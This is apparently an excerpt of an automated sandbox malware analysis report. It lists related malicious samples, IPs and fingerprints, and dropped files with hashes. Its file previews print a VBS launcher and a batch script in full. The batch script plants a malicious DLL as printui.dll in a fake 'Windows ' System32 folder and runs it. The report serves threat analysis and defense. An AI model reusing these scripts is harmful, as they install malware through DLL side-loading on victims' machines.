      worldtimeapi.orgexe4.bin.bak.exeGet hashmaliciousBlackMoon, GhostRatBrowse
      • 213.188.196.246
      https://troy-acoustics.neetoform.com/25d7349ac44d8bc00661Get hashmaliciousPhisherBrowse
      • 213.188.196.246
      4LAYhwU8S0.exeGet hashmaliciousCash Ransomware, PureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246
      4LAYhwU8S0.exeGet hashmaliciousCash Ransomware, PureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246
      CashKamera.exeGet hashmaliciousCash Ransomware, PureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246
      Nvidia.exeGet hashmaliciousCash Ransomware, PureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246
      zune.exeGet hashmaliciousCash Ransomware, PureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246
      C_RAAS.exeGet hashmaliciousCash Ransomware, PureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246
      MicroSIP.exeGet hashmaliciousCash Ransomware, PureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246
      CashRansomware.exeGet hashmaliciousPureLog Stealer, TrojanRansom, zgRATBrowse
      • 213.188.196.246

      ASNs

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      TELIA-NORWAY-ASTeliaNorwayCoreNetworksNOsora.mpsl.elfGet hashmaliciousMiraiBrowse
      • 146.225.111.184
      sora.sh4.elfGet hashmaliciousUnknownBrowse
      • 146.242.216.87
      firmware.mips.elfGet hashmaliciousUnknownBrowse
      • 194.43.246.10
      firmware.armv4l.elfGet hashmaliciousUnknownBrowse
      • 152.93.255.140
      jew.arm7.elfGet hashmaliciousMiraiBrowse
      • 139.145.68.35
      154.216.18.223-mips-2024-08-17T03_44_00.elfGet hashmaliciousMiraiBrowse
      • 213.225.83.142
      SecuriteInfo.com.Linux.Siggen.9999.23751.27873.elfGet hashmaliciousMiraiBrowse
      • 194.43.6.233
      hoho.x86.elfGet hashmaliciousMiraiBrowse
      • 146.240.126.137
      mpsl.elfGet hashmaliciousMiraiBrowse
      • 85.19.102.190
      sora.spc.elfGet hashmaliciousMiraiBrowse
      • 139.145.253.228
      MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousUnknownBrowse
      • 13.107.246.57
      sora.arm7.elfGet hashmaliciousMiraiBrowse
      • 20.169.237.51
      sora.mips.elfGet hashmaliciousMiraiBrowse
      • 72.152.158.255
      sora.ppc.elfGet hashmaliciousUnknownBrowse
      • 20.251.99.83
      sora.sh4.elfGet hashmaliciousMiraiBrowse
      • 72.153.3.164
      sora.spc.elfGet hashmaliciousMiraiBrowse
      • 20.213.16.242
      file.exeGet hashmaliciousUnknownBrowse
      • 13.107.246.67
      https://www.bettercaremarket.com.au/pill-bottle-opener-with-magnifier-aidapt.html?comet_source=google&comet_network=x&comet_campaign=20867905123&comet_ad_group=&comet_ad_id=&comet_keyword=&comet_type=smart&gad_source=1&gclid=EAIaIQobChMIqcj6sY-ZhwMV5tgWBR0YswpVEAQYASABEgJi9fD_BwEGet hashmaliciousUnknownBrowse
      • 150.171.27.10
      file.exeGet hashmaliciousUnknownBrowse
      • 13.107.246.60
      file.exeGet hashmaliciousUnknownBrowse
      • 13.107.246.64
      GOOGLE-AS-APGoogleAsiaPacificPteLtdSGgHPYUEh253.exeGet hashmaliciousDjvu, Neoreklami, Stealc, Vidar, XmrigBrowse
      • 34.117.59.81
      kqS23MOytx.exeGet hashmaliciousSocks5Systemz, Stealc, Vidar, XWorm, XmrigBrowse
      • 34.117.59.81
      i3F8zuP3u9.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
      • 34.117.59.81
      https://daehwa.info/uploaded/file/71677108868.pdfGet hashmaliciousPDFPhishBrowse
      • 34.117.39.58
      https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
      • 34.117.39.58
      Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 34.117.59.81
      eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      https://sesh-gangrene.shop/Get hashmaliciousHTMLPhisherBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81

      JA3 Fingerprints

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      bd0bf25947d4a37404f0424edf4db9adIDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      IDMCRK.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      IDMCRK.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81
      Ld0f3NDosJ.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      SecuriteInfo.com.Win32.MalwareX-gen.12431.9721.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      file.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      file.exeGet hashmaliciousUnknownBrowse
      • 34.117.59.81
      IDM_ACT.exeGet hashmaliciousFredy StealerBrowse
      • 34.117.59.81

      Dropped Files

      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Windows\System32\libcrypto-3-x64.dllLd0f3NDosJ.exeGet hashmaliciousUnknownBrowse
        C:\Windows \System32\printui.exeLd0f3NDosJ.exeGet hashmaliciousUnknownBrowse

          Created / dropped Files

          C:\ProgramData\Microsoft\Network\Downloader\edb.log

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.40702962548832927
          Encrypted:false
          SSDEEP:1536:fJeHJFZnnJF9U7JFCRImvqnDskXZrtlpZpaSh5hmn91nzw7LkL4b2bBbP+GCFH+W:fJyyWGWnzwHkL4WLnQnHZ
          MD5:759D35E63ABC448E4ADA337F8674D7F7
          SHA1:D7A7591FDF7AD5DB80780B1A49055C2D83799849
          SHA-256:93A10283D882C0FB2E06794998DD93203370BD413A230E1606293B5DE31C548B
          SHA-512:2A251CB073476CACC971C6A06FB158D77D1A702FE6C8921B6040C7F5FFEE37066F587F88780C10558EC2AEB4F969F70E032A2EC3AB5326110AC2CDB18ADDAF78
          Malicious:false
          Preview:.B..........@..@ /...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................%.O._..r.#.........`h.................h...............X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

          C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb5c00497, page size 16384, DirtyShutdown, Windows version 10.0
          Category:dropped
          Size (bytes):1310720
          Entropy (8bit):0.5145140919453204
          Encrypted:false
          SSDEEP:1536:FSB2ESB2SSjlK/av9qn5hbkL4ShyUqn/qnJKYkr3g16HL2UPkLk+kY07Q8zAkUk4:Fazakv+hkL4c2L2ULz
          MD5:02121134C8C7C9C10BE7245F6110C6C3
          SHA1:F47592F6A7983FCF6A765A70DC63F3D28FE6BEAA
          SHA-256:F94CD8E90C3E798646ADE952B33568BB10B84F00809D8A618F1B1DEDE2FAB242
          SHA-512:69A0B6408E19476DCAE7EC480A937C28E393BD356AA87B7FB439777EC94203B2841D3BD32CCB587FF49232EE67934F9D079DF5EBDDA0092AC01B4498B1EDF2BB
          Malicious:false
          Preview:....... ...............X\...;...{......................0.9..........{...'...|C.h.;.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ....... /...{...............................................................................................................................................................................................2...{..................................$.JT.'...|CF................0..'...|C..........................#......h.;.....................................................................................................................................................................................................................................................................................................................................................

          C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):16384
          Entropy (8bit):0.07847143481205551
          Encrypted:false
          SSDEEP:3:U/l/KYeXjlYljll/UWjHrJjOqHvjvJ+tZ8//lollx8m9v/ll/TnK2:Ut/KzXjlYljllnjHrJj7jBCImlLK
          MD5:FB2129F90B14268C2668B2F9123AE595
          SHA1:F4E05812D00F6038055D07491D4C174830EFEF85
          SHA-256:AC77B88F0334BACE1D5F2A39E0B14E4D6199A5265F8EF9049A24F4FDFE08FA04
          SHA-512:B7A2EF319736BD7B2DC0ADB02D41603D2B0A86F9718B1DE39678102EA4AFDA9B0EFDB4592117A2C20C0954B3B975FA44AA3328BB2FD96F70328F490D5CB24825
          Malicious:false
          Preview:...Y.....................................;...{...'...|C......{...............{.......{..8. u.....{.&................0..'...|C.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\ProgramData\USOShared\Logs\System\UpdateSessionOrchestration.0b187b60-ed6a-453b-9aff-eda3b85b7035.1.etl

          Download File
          Process:C:\Windows\System32\svchost.exe
          File Type:data
          Category:dropped
          Size (bytes):4096
          Entropy (8bit):1.1993388261293731
          Encrypted:false
          SSDEEP:12:BlmjqPqF69Fq5DZ4STk56GWtbgjO3s7Nxk56GtGj4txnmlNlmN:BAc1q4eGtm2jGtEs6NAN
          MD5:A3B43076C089F038A5B74409FC1442BE
          SHA1:CA4D8BCC4F1DA7E4E2F7E38F8F70790AFAC2C618
          SHA-256:174BD747F1F546A74FC7A5670CC4E8943A4A2CD901684B39986A07E43C7722CF
          SHA-512:60994934AD52E042D2958DD102E35F5E2E7D66D66C1F07E320BB917B8250D174591D031F0C566A409021BE4292AEF5E99576AD5FCAE856992A7688FA4C80D15A
          Malicious:false
          Preview:............................................................................D...x........=.....................eJ..............Zb..K....(......................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...........................................................0.!..Y...........=.............U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.U.S.O.S.h.a.r.e.d.\.L.o.g.s.\.S.y.s.t.e.m.\.U.p.d.a.t.e.S.e.s.s.i.o.n.O.r.c.h.e.s.t.r.a.t.i.o.n...0.b.1.8.7.b.6.0.-.e.d.6.a.-.4.5.3.b.-.9.a.f.f.-.e.d.a.3.b.8.5.b.7.0.3.5...1...e.t.l...........P.P.x........=.....................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:modified
          Size (bytes):20868
          Entropy (8bit):5.609193197692224
          Encrypted:false
          SSDEEP:384:7yBrkgXazJpXfKXhr7FrYE4MvRnSsT9MQw/GwLbzd/dEbJPTBqd:ur7a1gXhr1rRSm9ReHdObJNqd
          MD5:48466C8F35A61EF0961EEDB36E0DE609
          SHA1:D00891C5D947B31F8A220853FA0430F450624701
          SHA-256:6F5E787D27C9F7DE7B6B324CF29DC4F6926059DF4BE220C138461B21F6F57517
          SHA-512:F93598B1075704367E5079A55CC4367FF097CB440F99838CD906259AE5FFC039DACC794E0843FEBDD35028D5B87D6C5A821AE446DB5C4A43693CACC3505C5828
          Malicious:false
          Preview:@...e.....................?.s.d.J...7.n..............@..........H...............o..b~.D.poM...P..... .Microsoft.PowerShell.ConsoleHostD...............4..7..D.#V.....R.......System.Management.Automation0.................Vn.F..kLsw..........System..4...............<."..Ke@...j..........System.Core.4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.{.....#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.@................z.U..G...5.f.1........System.DirectoryServices<................t.,.lG....M...........System.Management...4...............&.QiA0aN.:... .G........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Utility...D....................+.H..!...e........System.Configuration.Ins

          C:\Users\user\AppData\Local\Temp\7zE4809A201\USB Drive.lnk

          Download File
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=8, Archive, ctime=Thu Aug 8 07:16:37 2024, mtime=Thu Aug 8 07:16:38 2024, atime=Thu Aug 8 07:16:38 2024, length=119, window=hide
          Category:dropped
          Size (bytes):1300
          Entropy (8bit):2.26064447735445
          Encrypted:false
          SSDEEP:24:8x0gMxnHR/IJl1JbAo0Jl1hJl1683+/QT4I0:8x0JRa3MNr/w83fMI
          MD5:E44C7B2DC7542BA7165E053FD841EA2F
          SHA1:CE93708A718F40EC073A8C34356038B9AE6E2B5E
          SHA-256:B6F6E77A428BFFB23BA965F3B9FA7394F990AD13982A4B92172FBDDC0CDD8987
          SHA-512:E3E6792AED270EB7111D6F093D58E3F5257676725619C3095380BB4A09465F1CCA1803D66D3074EE0A6D6EECF4A69B5B38A1A8CDF97ECCB1BCA3D63F42867634
          Malicious:false
          Preview:L..................F.@.. ....-.Ik.....hJk.....hJk...w............................P.O. .:i.....+00.../F:\...................V.1......Y.B..rootdir.@.......Y.B.Y.B......2....................,..r.o.o.t.d.i.r.....b.2.w....Y.B .x447823.vbs.H.......Y.B.Y.B..............................x.4.4.7.8.2.3...v.b.s.......E...............-.......D....................F:\rootdir\x447823.vbs......\.r.o.o.t.d.i.r.\.x.4.4.7.8.2.3...v.b.s...F.:.\.r.o.o.t.d.i.r...C.:.\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\System32\shell32.dll...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.S.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l...............................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\rootcomp.dat

          Download File
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):6
          Entropy (8bit):2.2516291673878226
          Encrypted:false
          SSDEEP:3:nVn:V
          MD5:571FE4CEECA162BBA292C656C321C891
          SHA1:F54C8D1AE78B173651EAA4440730842B71D80126
          SHA-256:148885C0673B85368C318F990D46A67FB9B56AF975022C2C2D48098AC01569B8
          SHA-512:E5551A9288F45E86051850794BB08E80715B09A4C2B467DCA7C15FAEED60E2434F8EF3E89ED126507DC1E67217D893E1DF2886D161A59289CA4617770364581A
          Malicious:false
          Preview:934305

          C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x249569.dat

          Download File
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):95849984
          Entropy (8bit):7.367539726749893
          Encrypted:false
          SSDEEP:1572864:A3zXXlu6Lhy1Oq8MPo+SbzfyS/YTP7ce0Lkvj8SrcaMAVnjRg256RILiFxJaiYUz:A3LXlXhy178MA/aS/YbXAkvj3cCVntgM
          MD5:B82F365E70C125AEFD791621BA8D8C67
          SHA1:49107FD07F9136CC653D81437BA4BB6359C1E1FD
          SHA-256:DE83854E2D6164FE087233F781655545137D9506CAA4CCBF780B11D370898F62
          SHA-512:09F0796265A6C6F56E8CE2E00C07A6EBB807B30318208304763F9C9F0426AE0690C2B7F8166A1803B541C9AD4A580ABCF1333D1E3AFA6F11ADE464663A37361D
          Malicious:true
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 54%
          • Antivirus: Virustotal, Detection: 42%, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9).OXG.OXG.OXG.?.B..XG.?.C.CXG.?.D.GXG.OXG.NXG..&B.kXG..&C.@XG..&D.FXG.?.F.LXG.OXF..XG.m'N.LXG.m'..NXG.m'E.NXG.RichOXG.........................PE..d......f.........." ...$............P-....................................................`..................................................C..(...............3.................p"..8...........................0!..@...............x............................text...}........................... ..`.rdata...<.......>..................@..@.data...x ...P.......B..............@....pdata...3.......4...L..............@..@_RDATA..\...........................@..@.fptable...........................@....rsrc..............................@..@.reloc.............................@..B................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x447823.vbs

          Download File
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):119
          Entropy (8bit):4.879308835659775
          Encrypted:false
          SSDEEP:3:jaPFEm8nh3QgNUqFDYHQcG5cNUqJajaPOUC:j6NqhPUqhYwcGCNUqOUC
          MD5:A0CB7DEDF43CA4A641537E13CBAB3220
          SHA1:E66D010295CD4517B8BBFFCD74F627B472320FBB
          SHA-256:EE4AC015963AA0EE8360B0B4EF1CFCED121DE0A2D58DBD5948E471EB51D3FADE
          SHA-512:4A4804B404A41AC812279C2A1B9528F7EF63D2C08687ECEFA6FD69A2069C9C30DCBB5E82CDB325B0A43F4836FEBACEEC3166893B7CD0C747581731274FFB2CB0
          Malicious:false
          Preview:Set WshShell = CreateObject("WScript.Shell")..WshShell.Run Chr(34) & "x615759.bat" & Chr(34), 0..Set WshShell = Nothing

          C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x447823.zip

          Download File
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
          Category:dropped
          Size (bytes):249
          Entropy (8bit):5.507708744653834
          Encrypted:false
          SSDEEP:6:5jQqSt6NHUvoB19cJVP01u3QqStOVHI/EAq+lN:5jQD6V9cvPlADO9AqaN
          MD5:3B09A6FDC74E236662B9F9CE062E58BF
          SHA1:25C471D361FE3CEC80AD9EFEDF6E3C1448680F4B
          SHA-256:81E13BE69F3FBC0585D9771790474E7E5CF4F2886177E287F6F0CEF732E1981B
          SHA-512:680D86D7EBCC5123FE5D9494F29FDCD70E5CDFC03D500ED1DFBDBE9195E59AD294DFF4E32225C4B8FC3EC26343C9B83F1E1DD1D9E49AF52E48C64D712B6EA1A8
          Malicious:false
          Preview:PK...........Y....]...w.......x447823.vbs.N-Q./...H..Q.Up.JM,I.O.JM..P..N..,(...*i.r.T....)8g.i..h*.)(U.....Z.%%.(..P....^.`T...K22...PK.............Y....]...w.....$....... .......x447823.vbs.. ...........hJk.....hJk....-.Ik...PK..........].........

          C:\Users\user\AppData\Local\Temp\7zE4809A201\rootdir\x615759.bat

          Download File
          Process:C:\Program Files\7-Zip\7zFM.exe
          File Type:DOS batch file, ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):781
          Entropy (8bit):4.992222605475276
          Encrypted:false
          SSDEEP:12:ozZQBCBKYoV5BpQBDx1ijBGvG5QBGfxBA3c09B13Bu09QB1sYocYoU:oCBCBQWBDxaBGu5QBGfxBAM09B1BHQBy
          MD5:20B537FFBE6B2D60948F0276012E9EA4
          SHA1:90B35D822ABEB32E0509F350C3B7494788CC4436
          SHA-256:52C4E9B32A2A8E0FFF86777FC761F3D8DCB34B6642F73091094A3A75624720C5
          SHA-512:3F2471A7F5CE6A997ED3D21A072C72F20C27CB573EF67C1661DF558F6C3713FD0CC1581A5009138A6F48083DB15A0F5A64D9C25EA7C1C9E564D0A60554C44984
          Malicious:false
          Preview:@echo off..chcp 65001..explorer "..\USB Drive"..if not exist "%SystemDrive%\Windows \System32\010101" (...if exist "%SystemDrive%\Windows \System32" rmdir /S /Q "\\?\%SystemDrive%\Windows "...mkdir "\\?\%SystemDrive%\Windows \System32"...mkdir "%SystemDrive%\Windows \System32\010101"...xcopy "%SystemDrive%\Windows\System32\printui.exe" "%SystemDrive%\Windows \System32" /Y...xcopy "x249569.dat" "%SystemDrive%\Windows \System32" /Y...ren "%SystemDrive%\Windows \System32\x249569.dat" "printui.dll"...if exist "%SystemDrive%\Windows \System32\printui.exe" (....if exist "%SystemDrive%\Windows \System32\printui.dll" (.....start "" "%SystemDrive%\Windows \System32\printui.exe"....) else rmdir /S /Q "\\?\%SystemDrive%\Windows "...) else rmdir /S /Q "\\?\%SystemDrive%\Windows "..)

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1wn1ecln.tuk.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3fu1l0v0.cbx.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53q0npks.lt3.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bw2zkhys.55z.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l32hkzye.ly0.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5hdl2yn.aii.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwt3wfbn.l0u.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v2d0yeu3.tym.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Windows \System32\printui.exe

          Download File
          Process:C:\Windows\System32\xcopy.exe
          File Type:PE32+ executable (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):64000
          Entropy (8bit):6.336447440888565
          Encrypted:false
          SSDEEP:768:a4uHmXrH60qKdC5vI1iQfCIWVM9G4qW4ne+S/ly+PKAoXRZX6fbX57UWkCRPPA7f:Uca1KAVIPd4n+lbeRZIbSQPPA7f
          MD5:2FC3530F3E05667F8240FC77F7486E7E
          SHA1:C52CC219886F29E5076CED98D6483E28FC5CC3E0
          SHA-256:AC75AF591C08442EA453EB92F6344E930585D912894E9323DB922BCD9EDF4CD1
          SHA-512:EF78DE6A114885B55806323F09D8BC24609966D29A31C2A5AE6AD93D1F0D584D29418BA76CA2F235ED30AD8AE2C91F552C15487C559E0411E978D397C82F7046
          Malicious:false
          Antivirus:
          • Antivirus: ReversingLabs, Detection: 0%
          • Antivirus: Virustotal, Detection: 0%, Browse
          Joe Sandbox View:
          • Filename: Ld0f3NDosJ.exe, Detection: malicious, Browse
          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........y..........................................................................Rich....................PE..d...0.sA.........."............................@.............................@.......E....`.......... .......................................'.......P.......@...............0..$...P$..T............................ ..............(!...............................text............................... ..`.rdata....... ......................@..@.data...x....0....... ..............@....pdata.......@......."..............@..@.rsrc........P.......$..............@..@.reloc..$....0......................@..B........................................................................................................................................................................................................................................................................

          C:\Windows \System32\x249569.dat

          Download File
          Process:C:\Windows\System32\xcopy.exe
          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
          Category:dropped
          Size (bytes):95849984
          Entropy (8bit):7.367539726749893
          Encrypted:false
